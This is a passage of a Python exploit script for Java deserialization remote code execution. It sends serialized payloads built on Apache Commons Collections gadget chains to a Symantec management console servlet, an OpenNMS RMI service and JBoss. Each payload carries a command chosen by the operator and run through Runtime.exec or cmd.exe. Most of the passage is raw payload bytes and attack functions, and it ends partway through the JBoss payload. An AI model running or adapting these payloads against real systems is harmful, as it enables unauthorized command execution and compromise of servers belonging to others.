'\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r\n \r\n cleng = len(_cmd)\r\n java_payload += chr(cleng) + _cmd\r\n java_payload += '\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r\n \r\n fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r\nContent-Type: application/binary\r\nContent-Disposition: form-data; name=\"Content\"\r\n \r\n%s \r\n \r\n------=_Part_0_992568364.1449677528532--\r\n\"\"\" % java_payload\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n \r\n headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r\n \"Content-type\":\"multipart/form-data;\",\r\n \"boundary\":\"----=_Part_0_992568364.1449677528532\",\r\n \"Accept\":\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\\r\\n\",\r\n \"Connection\":\"keep-alive\",\r\n \"Content-length\":\"%d\" % len(fullpayload)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/servlet/ConsoleServlet?ActionType=SendStatPing\", \"POST\", body=fullpayload, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef opennms_attack(HOST, PORT, _cmd):\r\n # The below code is based on the opennms_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for OpenNMS\r\n \"\"\"\r\n clen = len(_cmd)\r\n d1 = '\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b'\r\n d2 = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x05\\x70\\x77\\x6e\\x65\\x64\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74'\r\n d2 += '\\x00' + chr(clen)\r\n d2 += _cmd\r\n d2 += '\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f'\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((HOST, PORT))\r\n print(\"[i] Sending initial packets to OpenNMS RMI service\")\r\n s.sendall(d1)\r\n retdata = s.recv(8192)\r\n if retdata:\r\n #\r\n # We have received some data suggesting the OpenNMS RMI Registry has responded.\r\n # Time to exploit.\r\n #\r\n print(\"[+] OpenNMS RMI service responded. Sending the exploit code...\")\r\n s.sendall(d2)\r\n else:\r\n print(\"[-] Sorry, the RMI service didnt respond. Revert to manual attack.\")\r\n return 0\r\n \r\ndef jboss_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the jboss_java_serialize.nasl script within Nessus \r\n \"\"\"\r\n This function sets up the attack payload for JBoss\r\n \"\"\"\r\n body_serObj = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E